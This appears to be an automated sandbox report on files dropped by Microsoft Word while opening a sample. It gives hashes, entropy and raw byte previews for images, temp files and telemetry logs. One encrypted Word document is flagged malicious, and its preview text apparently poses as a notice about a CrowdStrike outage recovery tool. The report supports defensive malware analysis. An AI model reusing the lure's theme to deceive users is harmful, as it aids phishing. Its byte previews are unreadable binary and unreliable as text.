......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3
                              Category:dropped
                              Size (bytes):44995
                              Entropy (8bit):7.9304820357792645
                              Encrypted:false
                              SSDEEP:768:QYytYytYyziJ6D4TnrTn8zbDRrjzQLpFDSsgwpfw+6+i:QJJXiJ6DYrkLQ1Fhdpo+6+i
                              MD5:D76D9D62CD9BDB3201F8B08A60DDD681
                              SHA1:A0A5A65424C08AD3C165B72DCC790F5682149DA2
                              SHA-256:5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
                              SHA-512:2890D8218157B84D477D48772DE2FF81CE363EF3A1535CA5D3E2AEE48381EAD18C59827E944E127EED0412F317B9825CBB5AEF9CFAD953B0F20F8D720B10B121
                              Malicious:false
                              Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................F...........T...........ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 837x754, components 3
                              Category:dropped
                              Size (bytes):66364
                              Entropy (8bit):7.930881392262679
                              Encrypted:false
                              SSDEEP:768:UYytYytYy/OGTWD1qufcR9kyKfMhzEQnsi0Bm4/eevUAGEdUBS00dWX4VLZG:UJJLOGxJDiUiQnR6m4WAUEdUkgXM1G
                              MD5:FA62B61B2E012E56787AD09FF660B32A
                              SHA1:32F29245140B72BD99D4C42408EDA9DFE4F088CC
                              SHA-256:643C921D41C123EB27A5BED51AF0F611EA7ECB4EFD3A5FA34DE8FFBC8F5781FD
                              SHA-512:FB7145BAC331C9A246C49D1E9854398CF65DF6B023BC0E3448A10A4759FB6DA8D60D90316E29991FDE559D0E43A1D5BB5EA3D5837F284DEA3B9EED0143A1D3B6
                              Malicious:false
                              Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................E.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
                              Category:dropped
                              Size (bytes):74268
                              Entropy (8bit):7.9444839660162145
                              Encrypted:false
                              SSDEEP:1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
                              MD5:45C59288E77195B7C14579CD59717986
                              SHA1:AEF3C27DB85493C0E85CAD04E301C092640E7684
                              SHA-256:C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
                              SHA-512:7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
                              Malicious:false
                              Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 838x340, components 3
                              Category:dropped
                              Size (bytes):44995
                              Entropy (8bit):7.9304820357792645
                              Encrypted:false
                              SSDEEP:768:QYytYytYyziJ6D4TnrTn8zbDRrjzQLpFDSsgwpfw+6+i:QJJXiJ6DYrkLQ1Fhdpo+6+i
                              MD5:D76D9D62CD9BDB3201F8B08A60DDD681
                              SHA1:A0A5A65424C08AD3C165B72DCC790F5682149DA2
                              SHA-256:5B00B1362C95117CC1FBD59F3248ACF3F4DFE6F86D11999ECDEE9458F04E17E9
                              SHA-512:2890D8218157B84D477D48772DE2FF81CE363EF3A1535CA5D3E2AEE48381EAD18C59827E944E127EED0412F317B9825CBB5AEF9CFAD953B0F20F8D720B10B121
                              Malicious:false
                              Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................F...........T...........ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x518, components 3
                              Category:dropped
                              Size (bytes):79621
                              Entropy (8bit):7.949654755512444
                              Encrypted:false
                              SSDEEP:1536:EJJt5rmggmHt1zVpigR5lV4Bj1yh0/fakUhx4ZnfO8gf:EJJ3mg9/zVpigR5lw1HabP4ZfOx
                              MD5:54A07C35DADB508F554F0ED25AA155B3
                              SHA1:84FAC4D81E2AF4E920E4971F8A5D53AC4A8C6BDA
                              SHA-256:94EE01362EE9EE7E61A1A62BD197CFF851A64B1DE02AAFE24C1E0A464E4A6036
                              SHA-512:D9550DA2511C031F863C6DBDBEBE09E58E3DB74BC7EB564BF7667F8C8F12A55C155092074EDC2FF66AEA6AB7EF630E6625D7F50B68F4EF3215858A407F5320E1
                              Malicious:false
                              Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 841x744, components 3
                              Category:dropped
                              Size (bytes):74268
                              Entropy (8bit):7.9444839660162145
                              Encrypted:false
                              SSDEEP:1536:KJJ9JA6k9NJBwEQVuIeFVfm5iQmeDDRx/XBdRbX1o/:KJJ/uBw0FV+5iQmeBx/xdRbX1o/
                              MD5:45C59288E77195B7C14579CD59717986
                              SHA1:AEF3C27DB85493C0E85CAD04E301C092640E7684
                              SHA-256:C4AFC369DC15759D81E8563052CFDA5D04EF6B7F76177EB01AA4C2695CB1486F
                              SHA-512:7B1F375175780FC5864FA67C1CE64A885B471678EF2D966B00107AE3FBC1649EDE1388BC5F382A002105FC2F624DA230C64D21F005DA79D4EE9B7C20B5764BDE
                              Malicious:false
                              Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................I.......................ICC_PROFILE.......lcms.0..mntrRGB XYZ ............acspMSFT....lcms...........................-lcms................................................dmnd.......jdesc.......hdmdd.......hwtpt...P....rXYZ...d....bXYZ...x....gXYZ........rTRC........gTRC........bTRC........chrm.......$cprt.......!desc........lcms generated .................................................................................desc........sRGB........................................................................................desc........sRGB........................................................................................XYZ .......=........XYZ ......o...8.....XYZ ......$.........XYZ ......b.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|......................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft Word 2007+
                              Category:dropped
                              Size (bytes):250145
                              Entropy (8bit):7.9935463566733125
                              Encrypted:true
                              SSDEEP:6144:m00BJM20XF07Jtd0YPFKGTFHLYwgNkSagBRK3WJMLtFqFk06TOOp7uuVZpVPvG:wBJUXydtdfogBLngNMVG6xFqJ6TOOdur
                              MD5:891E6C7EC5DE6384509564D8A0DEDECF
                              SHA1:187994C9D8A21DD977473EF8E7A6EF4C7F2EAE52
                              SHA-256:1E224B11854CE62115305CE613169DAD1C4AA59D35C8482E979532ADCA124A10
                              SHA-512:27D6EF69B33A4F363E3D939EA4988A477B09F40401FF7645A6D7AA2ABDB9F7AD329C6A70B50996F27789164E5E2E4A41C12B3BACD2FB2B4EAC9486C00AD4D7E8
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Preview:PK..-.......!..am.............[Content_Types].xml.......................n.0.........D...(,...6@. W.Z.t...k'~..-Eh..tj.b.".Y.....Yw..|P.l^.X.F.Z..d..../,.(L-:k.d;..z....~. d.6.d+D... W.E(..C+..Z ..-wB..-.O..g..A0.cd.......0.}..}.J..}..E....:%..2...!.M.$..J.y......[...L..f.= ..D......R....r.6.p.+....Oj.W5dw....i......M..8f8.()F....[#..hU(s.r....(.a6(...&.....AS.].......w`.m.F.xT..........{.9o%.@8..#:.".p..=7m..$.".@NFx...d)..'.4..8E7Ft2..z../.d........z..} .8....N.@...=.$..c..s?....Q.....;i....>.>..[..{...}....9...,.. ..PK..-.......!..U~............._rels/.rels......................MK.1....!.;.*"..^D.Md..C2.........(.....3y..3C....+.4xW..(A.......yX.JB....Wp.....b..#InJ......*.E..b.=[J....M.%...a .B..,o0.f@=a... n........o.A..;.N.<...v.."...e...b.R...1..R.EF..7Z.n...hY..j.y..#1'.<....7.......9m.......3...Y.. ..PK..-.......!.qq..............word/document.xml....m.......2(.......}.n........^..-.N.3I QT.M..hw.9@..E...S$./.}...;.... .G.'..*R..v.@-+.A
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):81920
                              Entropy (8bit):4.099210753349057
                              Encrypted:false
                              SSDEEP:384:XtT+CgCz8l15lZzNKY235JzN0jyLUtT+DCz8l15lZzNKY235JzfN0jyL:6Ca/lZzNj235lNdZCa/lZzNj235lFd
                              MD5:400C84541516D75316906A9716BE824C
                              SHA1:B5CDC0ED9EF4354FB41237439FE682E5A082692E
                              SHA-256:E4718B7F3CF08AD696781B66DB4D1E84A7A6AE253BCFCDE4066CF02756EBBABA
                              SHA-512:DDB320F30F935FE4328503D3F19431CF036ABCCF30E6CF195AC03D8161007A1D21365E664AC06827119A7864671BF2AE9339FD42D7BFBA6ADA0A9DD65BB1544A
                              Malicious:false
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Composite Document File V2 Document, Cannot read section info
                              Category:dropped
                              Size (bytes):81920
                              Entropy (8bit):4.099210753349057
                              Encrypted:false
                              SSDEEP:384:XtT+CgCz8l15lZzNKY235JzN0jyLUtT+DCz8l15lZzNKY235JzfN0jyL:6Ca/lZzNj235lNdZCa/lZzNj235lFd
                              MD5:400C84541516D75316906A9716BE824C
                              SHA1:B5CDC0ED9EF4354FB41237439FE682E5A082692E
                              SHA-256:E4718B7F3CF08AD696781B66DB4D1E84A7A6AE253BCFCDE4066CF02756EBBABA
                              SHA-512:DDB320F30F935FE4328503D3F19431CF036ABCCF30E6CF195AC03D8161007A1D21365E664AC06827119A7864671BF2AE9339FD42D7BFBA6ADA0A9DD65BB1544A
                              Malicious:false
                              Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1536
                              Entropy (8bit):1.5093262897962565
                              Encrypted:false
                              SSDEEP:6:mEMEEEe9lCgKRAElAtsArA1klAHdtckxr/Dx:IYP/l/uH6x9rx
                              MD5:98F7DF0146DA5D1C46C6ABF7D49ECD62
                              SHA1:289E7FFF84BB3843BC652C1FF357CCEA960DAD2F
                              SHA-256:D5291DE37D4EFC109AB4052527CE3012DF209FB1672F0CCF61A4578B740A73C0
                              SHA-512:5E1D10067BFE38827433374C11C061F026BA80A9F5192CFF21155E99DB0699B8EB8B0C224FB277F7F9CC6E30BCD2779DCF66EAC99302CCD2CA0260DF93BF0DBC
                              Malicious:false
                              Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(...e.n.g.i.n.e.e.r...e......................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...\...n.......................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):43596
                              Entropy (8bit):3.6705361254320246
                              Encrypted:false
                              SSDEEP:768:6kDl9L3AFPz4qrkv8RkaOIvWRLjCOojE1iRUSlV8ivuCDSle3H0XJ44:pDlV3ABz4Ykv8RkaOIvIPCOojBV8CuCQ
                              MD5:814BF7F93B5683057A1729EA1FAE060E
                              SHA1:BE861A93A83D93F7D0076A62A3B891525F17BCFD
                              SHA-256:AC3B70A9AD0902B84A32390D07C75C4113600164F60C556EA6E54238FF3C1DF6
                              SHA-512:95A86E91C7808AC3DFB07FC104DEAAFF482C50F005BB9E651D3AC423B04D850592F4CC7C5D54F2B9C0DAC045C889DC6CFC7090AB8C4A8B7AEE5FA842A0BBAD8D
                              Malicious:false
                              Preview:..................................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .e.x.p.e.d.i.t.e. .t.h.e. .r.e.p.a.i.r. .p.r.o.c.e.s.s... .T.h.e. .s.i.g.n.e.d. ................................................................................... ..."...........L......................................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):1536
                              Entropy (8bit):1.5093262897962567
                              Encrypted:false
                              SSDEEP:3:ml+lGl+l+l+l1PPPlLlAytl7lhlJvl5hzldlxpxl/b1l/pl/Ppl/Rl/5bhlll/tB:mEMEEEe9lCgKCkgA9P61Y
                              MD5:92AC86FA3C6B284A98F00F49FDCACB49
                              SHA1:EBE19354C0CB86AEEA9525A3472CCECA8A313EBC
                              SHA-256:B7B29D8BC27DF9FAD485B4E802BDA6C39C14DC4CF3A9FB9B577E44219A61D9E7
                              SHA-512:6B47784EDD2E57F5774CEEE86747899CABBFF7AED2623F849872A47B8AF842F1EE4FEF8A7494D95C373F1D8D5C9F2E78E099F515252377BBB7E5DBD8A8E4AC2A
                              Malicious:false
                              Preview:....1.2.....1.2.....1.....1.....1.2.....1.2.....1.2.....1.2.....(.....(.....(.....(.....(...e.n.g.i.n.e.e.r...e......................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...&...(.......0...6...8...>...@...D...F...J...L...P...R...V...X...\...n.......................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):43596
                              Entropy (8bit):3.6705361254320246
                              Encrypted:false
                              SSDEEP:768:6kDl9L3AFPz4qrkv8RkaOIvWRLjCOojE1iRUSlV8ivuCDSle3H0XJ44:pDlV3ABz4Ykv8RkaOIvIPCOojBV8CuCQ
                              MD5:814BF7F93B5683057A1729EA1FAE060E
                              SHA1:BE861A93A83D93F7D0076A62A3B891525F17BCFD
                              SHA-256:AC3B70A9AD0902B84A32390D07C75C4113600164F60C556EA6E54238FF3C1DF6
                              SHA-512:95A86E91C7808AC3DFB07FC104DEAAFF482C50F005BB9E651D3AC423B04D850592F4CC7C5D54F2B9C0DAC045C889DC6CFC7090AB8C4A8B7AEE5FA842A0BBAD8D
                              Malicious:false
                              Preview:..................................A.s. .a. .f.o.l.l.o.w.-.u.p. .t.o. .t.h.e. .C.r.o.w.d.S.t.r.i.k.e. .F.a.l.c.o.n. .a.g.e.n.t. .i.s.s.u.e. .i.m.p.a.c.t.i.n.g. .W.i.n.d.o.w.s. .c.l.i.e.n.t.s. .a.n.d. .s.e.r.v.e.r.s.,. .M.i.c.r.o.s.o.f.t. .h.a.s. .r.e.l.e.a.s.e.d. .a.n...u.p.d.a.t.e.d...r.e.c.o.v.e.r.y. .t.o.o.l. .w.i.t.h...t.w.o. .r.e.p.a.i.r. .o.p.t.i.o.n.s...t.o. .h.e.l.p. .I.T. .a.d.m.i.n.s. .e.x.p.e.d.i.t.e. .t.h.e. .r.e.p.a.i.r. .p.r.o.c.e.s.s... .T.h.e. .s.i.g.n.e.d. ................................................................................... ..."...........L......................................................................................................................................................................................................................................................................................................................................................................$..&..F...d......d...d.-D..M............[$.\$.a$.gdK.e.....$.-D..
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:ASCII text, with very long lines (10173), with CRLF line terminators
                              Category:dropped
                              Size (bytes):30125
                              Entropy (8bit):5.477074988936344
                              Encrypted:false
                              SSDEEP:768:6CT+8jVZqN+uwTICQPwWoIIRgQazes1tDjjnnBFAmilMwtIffmz:6CT+8jVswuWICMwWoIIRgtes1tHrnBFq
                              MD5:767677ABAE05CEE23150528539A949DB
                              SHA1:5DEF58A91E987CC718FB51186F58CBE25EEA5E99
                              SHA-256:0EB1169E0391AFBEA5244963F7ECB56B04BBE47CF090F1E561FD5508CEAFCBEA
                              SHA-512:A22A4837D13628894020D596FFD1A6CA3A596C81990B7C6B61D120DACB58F1F387921D6F9F95C5642FA1CCC6A04FFF7B51A903BB55FFE05F719DBF68EEB6ABDC
                              Malicious:false
                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/22/2024 13:57:40.364.WINWORD (0x86C).0xC24.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-07-22T13:57:40.364Z","Contract":"Office.System.Activity","Activity.CV":"GOns7eqi3EmkFERUd6TzfQ.7.1","Activity.Duration":1309,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...07/22/2024 13:57:40.364.WINWORD (0x86C).0xC24.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2024-07-22T13:57:40.364Z","Contract":"Office.System.Activity","Activity.CV":"GOns7eqi3EmkFERUd6TzfQ.7","Activity.Duration":3803,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureDiag
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:ASCII text, with very long lines (28929), with CRLF line terminators
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.19469915830844212
                              Encrypted:false
                              SSDEEP:1536:8oMF0cgFWeIuTT5jpzo+cBwBuJG9/juQ6hzqBJJsjrDvWl0UOp+cqe29zjWnvj+d:Bc7eIU3o++w6Cfjl
                              MD5:651F2829FBA04A38F048069D9C6A2F71
                              SHA1:732800B964AAC1EC0362C60B934CD1F0826C1659
                              SHA-256:11C95D2AB3FBD174034CF0229C2A325D3FA103E045A587695AD16E02F5FEB5A2
                              SHA-512:1CA98CE46300DA7ED9A3566F0ED03976F234C8BCBFA4683236061A39A3BD5AC2492455B7409C462156EF573B2F5B2C2E16952206C74C1EA7D07A52A17A6D1E8A
                              Malicious:false
                              Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..07/22/2024 13:58:33.768.WINWORD (0xF10).0x19F8.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.GDIAssistant.HandleCallback","Flags":30962256044949761,"InternalSequenceNumber":24,"Time":"2024-07-22T13:58:33.768Z","Contract":"Office.System.Activity","Activity.CV":"spLUd5J+P0GyM7B2cBEPMg.1.14","Activity.Duration":17,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.GdiFamilyName":"","Data.CloudFontStatus":6,"Data.CloudFontTypes":256}...07/22/2024 13:58:33.768.WINWORD (0xF10).0x19F8.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Text.ResourceClient.Deserialize","Flags":30962256044949761,"InternalSequenceNumber":26,"Time":"2024-07-22T13:58:33.768Z","Contract":"Office.System.Activity","Activity.CV":"spLUd5J+P0GyM7B2cBEPMg.1.15","Activity.Duration":8845,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":true,"Data.JsonFileMajorVersion":
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:data
                              Category:dropped
                              Size (bytes):20971520
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3::
                              MD5:8F4E33F3DC3E414FF94E5FB6905CBA8C
                              SHA1:9674344C90C2F0646F0B78026E127C9B86E3AD77
                              SHA-256:CD52D81E25F372E6FA4DB2C0DFCEB59862C1969CAB17096DA352B34950C973CC
                              SHA-512:7FB91E868F3923BBD043725818EF3A5D8D08EBF1059A18AC0FE07040D32EEBA517DA11515E6A4AFAEB29BCC5E0F1543BA2C595B0FE8E6167DDC5E6793EDEF5BB
                              Malicious:false
                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):558035
                              Entropy (8bit):7.696653383430889
                              Encrypted:false
                              SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                              MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                              SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                              SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                              SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                              Malicious:false
                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):276
                              Entropy (8bit):3.5361139545278144
                              Encrypted:false
                              SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                              MD5:133D126F0DE2CC4B29ECE38194983265
                              SHA1:D8D701298D7949BE6235493925026ED405290D43
                              SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                              SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                              Malicious:false
                              Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.a.s.i.s...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                              File Type:Microsoft OOXML
                              Category:dropped
                              Size (bytes):570901
                              Entropy (8bit):7.674434888248144
                              Encrypted:false
                              SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                              MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                              SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                              SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                              SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                              Malicious:false
                              Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
